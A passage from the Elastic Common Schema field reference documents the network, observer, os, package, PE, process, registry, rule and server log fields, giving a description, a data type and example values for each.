"Implementing ECS". + +type: keyword + +example: aim + +-- + +*`network.bytes`*:: ++ +-- +Total bytes transferred in both directions. +If `source.bytes` and `destination.bytes` are known, `network.bytes` is their sum. 
+ +type: long + +example: 368 + +format: bytes + +-- + +*`network.community_id`*:: ++ +-- +A hash of source and destination IPs and ports, as well as the protocol used in a communication. This is a tool-agnostic standard to identify flows. +Learn more at https://github.com/corelight/community-id-spec. + +type: keyword + +example: 1:hO+sN4H+MG5MY/8hIrXPqc4ZQz0= + +-- + +*`network.direction`*:: ++ +-- +Direction of the network traffic. +Recommended values are: + * ingress + * egress + * inbound + * outbound + * internal + * external + * unknown + +When mapping events from a host-based monitoring context, populate this field from the host's point of view, using the values "ingress" or "egress". +When mapping events from a network or perimeter-based monitoring context, populate this field from the point of view of the network perimeter, using the values "inbound", "outbound", "internal" or "external". +Note that "internal" is not crossing perimeter boundaries, and is meant to describe communication between two hosts within the perimeter. Note also that "external" is meant to describe traffic between two hosts that are external to the perimeter. This could for example be useful for ISPs or VPN service providers. + +type: keyword + +example: inbound + +-- + +*`network.forwarded_ip`*:: ++ +-- +Host IP address when the source IP address is the proxy. + +type: ip + +example: 192.1.1.2 + +-- + +*`network.iana_number`*:: ++ +-- +IANA Protocol Number (https://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml). Standardized list of protocols. This aligns well with NetFlow and sFlow related logs which use the IANA Protocol Number. + +type: keyword + +example: 6 + +-- + +*`network.inner`*:: ++ +-- +Network.inner fields are added in addition to network.vlan fields to describe the innermost VLAN when q-in-q VLAN tagging is present. Allowed fields include vlan.id and vlan.name. 
Inner vlan fields are typically used when sending traffic with multiple 802.1q encapsulations to a network sensor (e.g. Zeek, Wireshark.) + +type: object + +-- + +*`network.inner.vlan.id`*:: ++ +-- +VLAN ID as reported by the observer. + +type: keyword + +example: 10 + +-- + +*`network.inner.vlan.name`*:: ++ +-- +Optional VLAN name as reported by the observer. + +type: keyword + +example: outside + +-- + +*`network.name`*:: ++ +-- +Name given by operators to sections of their network. + +type: keyword + +example: Guest Wifi + +-- + +*`network.packets`*:: ++ +-- +Total packets transferred in both directions. +If `source.packets` and `destination.packets` are known, `network.packets` is their sum. + +type: long + +example: 24 + +-- + +*`network.protocol`*:: ++ +-- +L7 Network protocol name. ex. http, lumberjack, transport protocol. +The field value must be normalized to lowercase for querying. See the documentation section "Implementing ECS". + +type: keyword + +example: http + +-- + +*`network.transport`*:: ++ +-- +Same as network.iana_number, but instead using the Keyword name of the transport layer (udp, tcp, ipv6-icmp, etc.) +The field value must be normalized to lowercase for querying. See the documentation section "Implementing ECS". + +type: keyword + +example: tcp + +-- + +*`network.type`*:: ++ +-- +In the OSI Model this would be the Network Layer. ipv4, ipv6, ipsec, pim, etc +The field value must be normalized to lowercase for querying. See the documentation section "Implementing ECS". + +type: keyword + +example: ipv4 + +-- + +*`network.vlan.id`*:: ++ +-- +VLAN ID as reported by the observer. + +type: keyword + +example: 10 + +-- + +*`network.vlan.name`*:: ++ +-- +Optional VLAN name as reported by the observer. + +type: keyword + +example: outside + +-- + +[float] +=== observer + +An observer is defined as a special network, security, or application device used to detect, observe, or create network, security, or application-related events and metrics. 
+This could be a custom hardware appliance or a server that has been configured to run special network, security, or application software. Examples include firewalls, web proxies, intrusion detection/prevention systems, network monitoring sensors, web application firewalls, data loss prevention systems, and APM servers. The observer.* fields shall be populated with details of the system, if any, that detects, observes and/or creates a network, security, or application event or metric. Message queues and ETL components used in processing events or metrics are not considered observers in ECS. + + +*`observer.egress`*:: ++ +-- +Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. + +type: object + +-- + +*`observer.egress.interface.alias`*:: ++ +-- +Interface alias as reported by the system, typically used in firewall implementations for e.g. inside, outside, or dmz logical interface naming. + +type: keyword + +example: outside + +-- + +*`observer.egress.interface.id`*:: ++ +-- +Interface ID as reported by an observer (typically SNMP interface ID). + +type: keyword + +example: 10 + +-- + +*`observer.egress.interface.name`*:: ++ +-- +Interface name as reported by the system. + +type: keyword + +example: eth0 + +-- + +*`observer.egress.vlan.id`*:: ++ +-- +VLAN ID as reported by the observer. + +type: keyword + +example: 10 + +-- + +*`observer.egress.vlan.name`*:: ++ +-- +Optional VLAN name as reported by the observer. + +type: keyword + +example: outside + +-- + +*`observer.egress.zone`*:: ++ +-- +Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. + +type: keyword + +example: Public_Internet + +-- + +*`observer.geo.city_name`*:: ++ +-- +City name. 
+ +type: keyword + +example: Montreal + +-- + +*`observer.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + +*`observer.geo.continent_name`*:: ++ +-- +Name of the continent. + +type: keyword + +example: North America + +-- + +*`observer.geo.country_iso_code`*:: ++ +-- +Country ISO code. + +type: keyword + +example: CA + +-- + +*`observer.geo.country_name`*:: ++ +-- +Country name. + +type: keyword + +example: Canada + +-- + +*`observer.geo.location`*:: ++ +-- +Longitude and latitude. + +type: geo_point + +example: { "lon": -73.614830, "lat": 45.505918 } + +-- + +*`observer.geo.name`*:: ++ +-- +User-defined description of a location, at the level of granularity they care about. +Could be the name of their data centers, the floor number, if this describes a local physical entity, city names. +Not typically used in automated geolocation. + +type: keyword + +example: boston-dc + +-- + +*`observer.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + +*`observer.geo.region_iso_code`*:: ++ +-- +Region ISO code. + +type: keyword + +example: CA-QC + +-- + +*`observer.geo.region_name`*:: ++ +-- +Region name. + +type: keyword + +example: Quebec + +-- + +*`observer.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + +*`observer.hostname`*:: ++ +-- +Hostname of the observer. + +type: keyword + +-- + +*`observer.ingress`*:: ++ +-- +Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. 
+ +type: object + +-- + +*`observer.ingress.interface.alias`*:: ++ +-- +Interface alias as reported by the system, typically used in firewall implementations for e.g. inside, outside, or dmz logical interface naming. + +type: keyword + +example: outside + +-- + +*`observer.ingress.interface.id`*:: ++ +-- +Interface ID as reported by an observer (typically SNMP interface ID). + +type: keyword + +example: 10 + +-- + +*`observer.ingress.interface.name`*:: ++ +-- +Interface name as reported by the system. + +type: keyword + +example: eth0 + +-- + +*`observer.ingress.vlan.id`*:: ++ +-- +VLAN ID as reported by the observer. + +type: keyword + +example: 10 + +-- + +*`observer.ingress.vlan.name`*:: ++ +-- +Optional VLAN name as reported by the observer. + +type: keyword + +example: outside + +-- + +*`observer.ingress.zone`*:: ++ +-- +Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. + +type: keyword + +example: DMZ + +-- + +*`observer.ip`*:: ++ +-- +IP addresses of the observer. + +type: ip + +-- + +*`observer.mac`*:: ++ +-- +MAC addresses of the observer. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. + +type: keyword + +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + +-- + +*`observer.name`*:: ++ +-- +Custom name of the observer. +This is a name that can be given to an observer. This can be helpful for example if multiple firewalls of the same model are used in an organization. +If no custom name is needed, the field can be left empty. + +type: keyword + +example: 1_proxySG + +-- + +*`observer.os.family`*:: ++ +-- +OS family (such as redhat, debian, freebsd, windows). 
+ +type: keyword + +example: debian + +-- + +*`observer.os.full`*:: ++ +-- +Operating system name, including the version or code name. + +type: keyword + +example: Mac OS Mojave + +-- + +*`observer.os.full.text`*:: ++ +-- +type: text + +-- + +*`observer.os.kernel`*:: ++ +-- +Operating system kernel version as a raw string. + +type: keyword + +example: 4.4.0-112-generic + +-- + +*`observer.os.name`*:: ++ +-- +Operating system name, without the version. + +type: keyword + +example: Mac OS X + +-- + +*`observer.os.name.text`*:: ++ +-- +type: text + +-- + +*`observer.os.platform`*:: ++ +-- +Operating system platform (such centos, ubuntu, windows). + +type: keyword + +example: darwin + +-- + +*`observer.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + +*`observer.os.version`*:: ++ +-- +Operating system version as a raw string. + +type: keyword + +example: 10.14.1 + +-- + +*`observer.product`*:: ++ +-- +The product name of the observer. + +type: keyword + +example: s200 + +-- + +*`observer.serial_number`*:: ++ +-- +Observer serial number. + +type: keyword + +-- + +*`observer.type`*:: ++ +-- +The type of the observer the data is coming from. +There is no predefined list of observer types. Some examples are `forwarder`, `firewall`, `ids`, `ips`, `proxy`, `poller`, `sensor`, `APM server`. + +type: keyword + +example: firewall + +-- + +*`observer.vendor`*:: ++ +-- +Vendor name of the observer. + +type: keyword + +example: Symantec + +-- + +*`observer.version`*:: ++ +-- +Observer version. 
+ +type: keyword + +-- + +[float] +=== organization + +The organization fields enrich data with information about the company or entity the data is associated with. +These fields help you arrange or filter data stored in an index by one or multiple organizations. + + +*`organization.id`*:: ++ +-- +Unique identifier for the organization. + +type: keyword + +-- + +*`organization.name`*:: ++ +-- +Organization name. + +type: keyword + +-- + +*`organization.name.text`*:: ++ +-- +type: text + +-- + +[float] +=== os + +The OS fields contain information about the operating system. + + +*`os.family`*:: ++ +-- +OS family (such as redhat, debian, freebsd, windows). + +type: keyword + +example: debian + +-- + +*`os.full`*:: ++ +-- +Operating system name, including the version or code name. + +type: keyword + +example: Mac OS Mojave + +-- + +*`os.full.text`*:: ++ +-- +type: text + +-- + +*`os.kernel`*:: ++ +-- +Operating system kernel version as a raw string. + +type: keyword + +example: 4.4.0-112-generic + +-- + +*`os.name`*:: ++ +-- +Operating system name, without the version. + +type: keyword + +example: Mac OS X + +-- + +*`os.name.text`*:: ++ +-- +type: text + +-- + +*`os.platform`*:: ++ +-- +Operating system platform (such centos, ubuntu, windows). + +type: keyword + +example: darwin + +-- + +*`os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + +*`os.version`*:: ++ +-- +Operating system version as a raw string. + +type: keyword + +example: 10.14.1 + +-- + +[float] +=== package + +These fields contain information about an installed software package. 
It contains general information about a package, such as name, version or size. It also contains installation details, such as time or location. + + +*`package.architecture`*:: ++ +-- +Package architecture. + +type: keyword + +example: x86_64 + +-- + +*`package.build_version`*:: ++ +-- +Additional information about the build version of the installed package. +For example use the commit SHA of a non-released package. + +type: keyword + +example: 36f4f7e89dd61b0988b12ee000b98966867710cd + +-- + +*`package.checksum`*:: ++ +-- +Checksum of the installed package for verification. + +type: keyword + +example: 68b329da9893e34099c7d8ad5cb9c940 + +-- + +*`package.description`*:: ++ +-- +Description of the package. + +type: keyword + +example: Open source programming language to build simple/reliable/efficient software. + +-- + +*`package.install_scope`*:: ++ +-- +Indicating how the package was installed, e.g. user-local, global. + +type: keyword + +example: global + +-- + +*`package.installed`*:: ++ +-- +Time when package was installed. + +type: date + +-- + +*`package.license`*:: ++ +-- +License under which the package was released. +Use a short name, e.g. the license identifier from SPDX License List where possible (https://spdx.org/licenses/). + +type: keyword + +example: Apache License 2.0 + +-- + +*`package.name`*:: ++ +-- +Package name + +type: keyword + +example: go + +-- + +*`package.path`*:: ++ +-- +Path where the package is installed. + +type: keyword + +example: /usr/local/Cellar/go/1.12.9/ + +-- + +*`package.reference`*:: ++ +-- +Home page or reference URL of the software in this package, if available. + +type: keyword + +example: https://golang.org + +-- + +*`package.size`*:: ++ +-- +Package size in bytes. + +type: long + +example: 62231 + +format: string + +-- + +*`package.type`*:: ++ +-- +Type of package. +This should contain the package file type, rather than the package manager name. Examples: rpm, dpkg, brew, npm, gem, nupkg, jar. 
+ +type: keyword + +example: rpm + +-- + +*`package.version`*:: ++ +-- +Package version + +type: keyword + +example: 1.12.9 + +-- + +[float] +=== pe + +These fields contain Windows Portable Executable (PE) metadata. + + +*`pe.architecture`*:: ++ +-- +CPU architecture target for the file. + +type: keyword + +example: x64 + +-- + +*`pe.company`*:: ++ +-- +Internal company name of the file, provided at compile-time. + +type: keyword + +example: Microsoft Corporation + +-- + +*`pe.description`*:: ++ +-- +Internal description of the file, provided at compile-time. + +type: keyword + +example: Paint + +-- + +*`pe.file_version`*:: ++ +-- +Internal version of the file, provided at compile-time. + +type: keyword + +example: 6.3.9600.17415 + +-- + +*`pe.imphash`*:: ++ +-- +A hash of the imports in a PE file. An imphash -- or import hash -- can be used to fingerprint binaries even after recompilation or other code-level transformations have occurred, which would change more traditional hash values. +Learn more at https://www.fireeye.com/blog/threat-research/2014/01/tracking-malware-import-hashing.html. + +type: keyword + +example: 0c6803c4e922103c4dca5963aad36ddf + +-- + +*`pe.original_file_name`*:: ++ +-- +Internal name of the file, provided at compile-time. + +type: keyword + +example: MSPAINT.EXE + +-- + +*`pe.product`*:: ++ +-- +Internal product name of the file, provided at compile-time. + +type: keyword + +example: Microsoft® Windows® Operating System + +-- + +[float] +=== process + +These fields contain information about a process. +These fields can help you correlate metrics information with a process id/name from a log message. The `process.pid` often stays in the metric itself and is copied to the global field for correlation. + + +*`process.args`*:: ++ +-- +Array of process arguments, starting with the absolute path to the executable. +May be filtered to protect sensitive information. 
+ +type: keyword + +example: ["/usr/bin/ssh", "-l", "user", "10.0.0.16"] + +-- + +*`process.args_count`*:: ++ +-- +Length of the process.args array. +This field can be useful for querying or performing bucket analysis on how many arguments were provided to start a process. More arguments may be an indication of suspicious activity. + +type: long + +example: 4 + +-- + +*`process.code_signature.exists`*:: ++ +-- +Boolean to capture if a signature is present. + +type: boolean + +example: true + +-- + +*`process.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + +*`process.code_signature.status`*:: ++ +-- +Additional information about the certificate status. +This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. + +type: keyword + +example: ERROR_UNTRUSTED_ROOT + +-- + +*`process.code_signature.subject_name`*:: ++ +-- +Subject name of the code signer + +type: keyword + +example: Microsoft Corporation + +-- + +*`process.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + +*`process.code_signature.trusted`*:: ++ +-- +Stores the trust status of the certificate chain. +Validating the trust of the certificate chain may be complicated, and this field should only be populated by tools that actively check the status. + +type: boolean + +example: true + +-- + +*`process.code_signature.valid`*:: ++ +-- +Boolean to capture if the digital signature is verified against the binary content. +Leave unpopulated if a certificate was unchecked. 
+ +type: boolean + +example: true + +-- + +*`process.command_line`*:: ++ +-- +Full command line that started the process, including the absolute path to the executable, and all arguments. +Some arguments may be filtered to protect sensitive information. + +type: keyword + +example: /usr/bin/ssh -l user 10.0.0.16 + +-- + +*`process.command_line.text`*:: ++ +-- +type: text + +-- + +*`process.entity_id`*:: ++ +-- +Unique identifier for the process. +The implementation of this is specified by the data source, but some examples of what could be used here are a process-generated UUID, Sysmon Process GUIDs, or a hash of some uniquely identifying components of a process. +Constructing a globally unique identifier is a common practice to mitigate PID reuse as well as to identify a specific process over time, across multiple monitored hosts. + +type: keyword + +example: c2c455d9f99375d + +-- + +*`process.executable`*:: ++ +-- +Absolute path to the process executable. + +type: keyword + +example: /usr/bin/ssh + +-- + +*`process.executable.text`*:: ++ +-- +type: text + +-- + +*`process.exit_code`*:: ++ +-- +The exit code of the process, if this is a termination event. +The field should be absent if there is no exit code for the event (e.g. process start). + +type: long + +example: 137 + +-- + +*`process.hash.md5`*:: ++ +-- +MD5 hash. + +type: keyword + +-- + +*`process.hash.sha1`*:: ++ +-- +SHA1 hash. + +type: keyword + +-- + +*`process.hash.sha256`*:: ++ +-- +SHA256 hash. + +type: keyword + +-- + +*`process.hash.sha512`*:: ++ +-- +SHA512 hash. + +type: keyword + +-- + +*`process.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + +*`process.name`*:: ++ +-- +Process name. +Sometimes called program name or similar. + +type: keyword + +example: ssh + +-- + +*`process.name.text`*:: ++ +-- +type: text + +-- + +*`process.parent.args`*:: ++ +-- +Array of process arguments, starting with the absolute path to the executable. +May be filtered to protect sensitive information. 
+ +type: keyword + +example: ["/usr/bin/ssh", "-l", "user", "10.0.0.16"] + +-- + +*`process.parent.args_count`*:: ++ +-- +Length of the process.args array. +This field can be useful for querying or performing bucket analysis on how many arguments were provided to start a process. More arguments may be an indication of suspicious activity. + +type: long + +example: 4 + +-- + +*`process.parent.code_signature.exists`*:: ++ +-- +Boolean to capture if a signature is present. + +type: boolean + +example: true + +-- + +*`process.parent.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + +*`process.parent.code_signature.status`*:: ++ +-- +Additional information about the certificate status. +This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. + +type: keyword + +example: ERROR_UNTRUSTED_ROOT + +-- + +*`process.parent.code_signature.subject_name`*:: ++ +-- +Subject name of the code signer + +type: keyword + +example: Microsoft Corporation + +-- + +*`process.parent.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + +*`process.parent.code_signature.trusted`*:: ++ +-- +Stores the trust status of the certificate chain. +Validating the trust of the certificate chain may be complicated, and this field should only be populated by tools that actively check the status. + +type: boolean + +example: true + +-- + +*`process.parent.code_signature.valid`*:: ++ +-- +Boolean to capture if the digital signature is verified against the binary content. 
+Leave unpopulated if a certificate was unchecked. + +type: boolean + +example: true + +-- + +*`process.parent.command_line`*:: ++ +-- +Full command line that started the process, including the absolute path to the executable, and all arguments. +Some arguments may be filtered to protect sensitive information. + +type: keyword + +example: /usr/bin/ssh -l user 10.0.0.16 + +-- + +*`process.parent.command_line.text`*:: ++ +-- +type: text + +-- + +*`process.parent.entity_id`*:: ++ +-- +Unique identifier for the process. +The implementation of this is specified by the data source, but some examples of what could be used here are a process-generated UUID, Sysmon Process GUIDs, or a hash of some uniquely identifying components of a process. +Constructing a globally unique identifier is a common practice to mitigate PID reuse as well as to identify a specific process over time, across multiple monitored hosts. + +type: keyword + +example: c2c455d9f99375d + +-- + +*`process.parent.executable`*:: ++ +-- +Absolute path to the process executable. + +type: keyword + +example: /usr/bin/ssh + +-- + +*`process.parent.executable.text`*:: ++ +-- +type: text + +-- + +*`process.parent.exit_code`*:: ++ +-- +The exit code of the process, if this is a termination event. +The field should be absent if there is no exit code for the event (e.g. process start). + +type: long + +example: 137 + +-- + +*`process.parent.hash.md5`*:: ++ +-- +MD5 hash. + +type: keyword + +-- + +*`process.parent.hash.sha1`*:: ++ +-- +SHA1 hash. + +type: keyword + +-- + +*`process.parent.hash.sha256`*:: ++ +-- +SHA256 hash. + +type: keyword + +-- + +*`process.parent.hash.sha512`*:: ++ +-- +SHA512 hash. + +type: keyword + +-- + +*`process.parent.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + +*`process.parent.name`*:: ++ +-- +Process name. +Sometimes called program name or similar. 
+ +type: keyword + +example: ssh + +-- + +*`process.parent.name.text`*:: ++ +-- +type: text + +-- + +*`process.parent.pe.architecture`*:: ++ +-- +CPU architecture target for the file. + +type: keyword + +example: x64 + +-- + +*`process.parent.pe.company`*:: ++ +-- +Internal company name of the file, provided at compile-time. + +type: keyword + +example: Microsoft Corporation + +-- + +*`process.parent.pe.description`*:: ++ +-- +Internal description of the file, provided at compile-time. + +type: keyword + +example: Paint + +-- + +*`process.parent.pe.file_version`*:: ++ +-- +Internal version of the file, provided at compile-time. + +type: keyword + +example: 6.3.9600.17415 + +-- + +*`process.parent.pe.imphash`*:: ++ +-- +A hash of the imports in a PE file. An imphash -- or import hash -- can be used to fingerprint binaries even after recompilation or other code-level transformations have occurred, which would change more traditional hash values. +Learn more at https://www.fireeye.com/blog/threat-research/2014/01/tracking-malware-import-hashing.html. + +type: keyword + +example: 0c6803c4e922103c4dca5963aad36ddf + +-- + +*`process.parent.pe.original_file_name`*:: ++ +-- +Internal name of the file, provided at compile-time. + +type: keyword + +example: MSPAINT.EXE + +-- + +*`process.parent.pe.product`*:: ++ +-- +Internal product name of the file, provided at compile-time. + +type: keyword + +example: Microsoft® Windows® Operating System + +-- + +*`process.parent.pgid`*:: ++ +-- +Identifier of the group of processes the process belongs to. + +type: long + +format: string + +-- + +*`process.parent.pid`*:: ++ +-- +Process id. + +type: long + +example: 4242 + +format: string + +-- + +*`process.parent.ppid`*:: ++ +-- +Parent process' pid. + +type: long + +example: 4241 + +format: string + +-- + +*`process.parent.start`*:: ++ +-- +The time the process started. + +type: date + +example: 2016-05-23T08:05:34.853Z + +-- + +*`process.parent.thread.id`*:: ++ +-- +Thread ID. 
+ +type: long + +example: 4242 + +format: string + +-- + +*`process.parent.thread.name`*:: ++ +-- +Thread name. + +type: keyword + +example: thread-0 + +-- + +*`process.parent.title`*:: ++ +-- +Process title. +The proctitle, some times the same as process name. Can also be different: for example a browser setting its title to the web page currently opened. + +type: keyword + +-- + +*`process.parent.title.text`*:: ++ +-- +type: text + +-- + +*`process.parent.uptime`*:: ++ +-- +Seconds the process has been up. + +type: long + +example: 1325 + +-- + +*`process.parent.working_directory`*:: ++ +-- +The working directory of the process. + +type: keyword + +example: /home/alice + +-- + +*`process.parent.working_directory.text`*:: ++ +-- +type: text + +-- + +*`process.pe.architecture`*:: ++ +-- +CPU architecture target for the file. + +type: keyword + +example: x64 + +-- + +*`process.pe.company`*:: ++ +-- +Internal company name of the file, provided at compile-time. + +type: keyword + +example: Microsoft Corporation + +-- + +*`process.pe.description`*:: ++ +-- +Internal description of the file, provided at compile-time. + +type: keyword + +example: Paint + +-- + +*`process.pe.file_version`*:: ++ +-- +Internal version of the file, provided at compile-time. + +type: keyword + +example: 6.3.9600.17415 + +-- + +*`process.pe.imphash`*:: ++ +-- +A hash of the imports in a PE file. An imphash -- or import hash -- can be used to fingerprint binaries even after recompilation or other code-level transformations have occurred, which would change more traditional hash values. +Learn more at https://www.fireeye.com/blog/threat-research/2014/01/tracking-malware-import-hashing.html. + +type: keyword + +example: 0c6803c4e922103c4dca5963aad36ddf + +-- + +*`process.pe.original_file_name`*:: ++ +-- +Internal name of the file, provided at compile-time. 
+ +type: keyword + +example: MSPAINT.EXE + +-- + +*`process.pe.product`*:: ++ +-- +Internal product name of the file, provided at compile-time. + +type: keyword + +example: Microsoft® Windows® Operating System + +-- + +*`process.pgid`*:: ++ +-- +Identifier of the group of processes the process belongs to. + +type: long + +format: string + +-- + +*`process.pid`*:: ++ +-- +Process id. + +type: long + +example: 4242 + +format: string + +-- + +*`process.ppid`*:: ++ +-- +Parent process' pid. + +type: long + +example: 4241 + +format: string + +-- + +*`process.start`*:: ++ +-- +The time the process started. + +type: date + +example: 2016-05-23T08:05:34.853Z + +-- + +*`process.thread.id`*:: ++ +-- +Thread ID. + +type: long + +example: 4242 + +format: string + +-- + +*`process.thread.name`*:: ++ +-- +Thread name. + +type: keyword + +example: thread-0 + +-- + +*`process.title`*:: ++ +-- +Process title. +The proctitle, some times the same as process name. Can also be different: for example a browser setting its title to the web page currently opened. + +type: keyword + +-- + +*`process.title.text`*:: ++ +-- +type: text + +-- + +*`process.uptime`*:: ++ +-- +Seconds the process has been up. + +type: long + +example: 1325 + +-- + +*`process.working_directory`*:: ++ +-- +The working directory of the process. + +type: keyword + +example: /home/alice + +-- + +*`process.working_directory.text`*:: ++ +-- +type: text + +-- + +[float] +=== registry + +Fields related to Windows Registry operations. + + +*`registry.data.bytes`*:: ++ +-- +Original bytes written with base64 encoding. +For Windows registry operations, such as SetValueEx and RegQueryValueEx, this corresponds to the data pointed by `lp_data`. This is optional but provides better recoverability and should be populated for REG_BINARY encoded values. + +type: keyword + +example: ZQBuAC0AVQBTAAAAZQBuAAAAAAA= + +-- + +*`registry.data.strings`*:: ++ +-- +Content when writing string types. 
+Populated as an array when writing string data to the registry. For single string registry types (REG_SZ, REG_EXPAND_SZ), this should be an array with one string. For sequences of string with REG_MULTI_SZ, this array will be variable length. For numeric data, such as REG_DWORD and REG_QWORD, this should be populated with the decimal representation (e.g `"1"`). + +type: keyword + +example: ["C:\rta\red_ttp\bin\myapp.exe"] + +-- + +*`registry.data.type`*:: ++ +-- +Standard registry type for encoding contents + +type: keyword + +example: REG_SZ + +-- + +*`registry.hive`*:: ++ +-- +Abbreviated name for the hive. + +type: keyword + +example: HKLM + +-- + +*`registry.key`*:: ++ +-- +Hive-relative path of keys. + +type: keyword + +example: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winword.exe + +-- + +*`registry.path`*:: ++ +-- +Full path, including hive, key and value + +type: keyword + +example: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winword.exe\Debugger + +-- + +*`registry.value`*:: ++ +-- +Name of the value written. + +type: keyword + +example: Debugger + +-- + +[float] +=== related + +This field set is meant to facilitate pivoting around a piece of data. +Some pieces of information can be seen in many places in an ECS event. To facilitate searching for them, store an array of all seen values to their corresponding field in `related.`. +A concrete example is IP addresses, which can be under host, observer, source, destination, client, server, and network.forwarded_ip. If you append all IPs to `related.ip`, you can then search for a given IP trivially, no matter where it appeared, by querying `related.ip:192.0.2.15`. + + +*`related.hash`*:: ++ +-- +All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). 
+ +type: keyword + +-- + +*`related.hosts`*:: ++ +-- +All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. + +type: keyword + +-- + +*`related.ip`*:: ++ +-- +All of the IPs seen on your event. + +type: ip + +-- + +*`related.user`*:: ++ +-- +All the user names seen on your event. + +type: keyword + +-- + +[float] +=== rule + +Rule fields are used to capture the specifics of any observer or agent rules that generate alerts or other notable events. +Examples of data sources that would populate the rule fields include: network admission control platforms, network or host IDS/IPS, network firewalls, web application firewalls, url filters, endpoint detection and response (EDR) systems, etc. + + +*`rule.author`*:: ++ +-- +Name, organization, or pseudonym of the author or authors who created the rule used to generate this event. + +type: keyword + +example: ["Star-Lord"] + +-- + +*`rule.category`*:: ++ +-- +A categorization value keyword used by the entity using the rule for detection of this event. + +type: keyword + +example: Attempted Information Leak + +-- + +*`rule.description`*:: ++ +-- +The description of the rule generating the event. + +type: keyword + +example: Block requests to public DNS over HTTPS / TLS protocols + +-- + +*`rule.id`*:: ++ +-- +A rule ID that is unique within the scope of an agent, observer, or other entity using the rule for detection of this event. + +type: keyword + +example: 101 + +-- + +*`rule.license`*:: ++ +-- +Name of the license under which the rule used to generate this event is made available. + +type: keyword + +example: Apache 2.0 + +-- + +*`rule.name`*:: ++ +-- +The name of the rule or signature generating the event. + +type: keyword + +example: BLOCK_DNS_over_TLS + +-- + +*`rule.reference`*:: ++ +-- +Reference URL to additional information about the rule used to generate this event. 
+The URL can point to the vendor's documentation about the rule. If that's not available, it can also be a link to a more general page describing this type of alert. + +type: keyword + +example: https://en.wikipedia.org/wiki/DNS_over_TLS + +-- + +*`rule.ruleset`*:: ++ +-- +Name of the ruleset, policy, group, or parent category in which the rule used to generate this event is a member. + +type: keyword + +example: Standard_Protocol_Filters + +-- + +*`rule.uuid`*:: ++ +-- +A rule ID that is unique within the scope of a set or group of agents, observers, or other entities using the rule for detection of this event. + +type: keyword + +example: 1100110011 + +-- + +*`rule.version`*:: ++ +-- +The version / revision of the rule being used for analysis. + +type: keyword + +example: 1.1 + +-- + +[float] +=== server + +A Server is defined as the responder in a network connection for events regarding sessions, connections, or bidirectional flow records. +For TCP events, the server is the receiver of the initial SYN packet(s) of the TCP connection. For other protocols, the server is generally the responder in the network transaction. Some systems actually use the term "responder" to refer the server in TCP connections. The server fields describe details about the system acting as the server in the network event. Server fields are usually populated in conjunction with client fields. Server fields are generally not populated for packet-level events. +Client / server representations can add semantic context to an exchange, which is helpful to visualize the data in certain situations. If your context falls in that category, you should still ensure that source and destination are filled appropriately. + + +*`server.address`*:: ++ +-- +Some event server addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. 
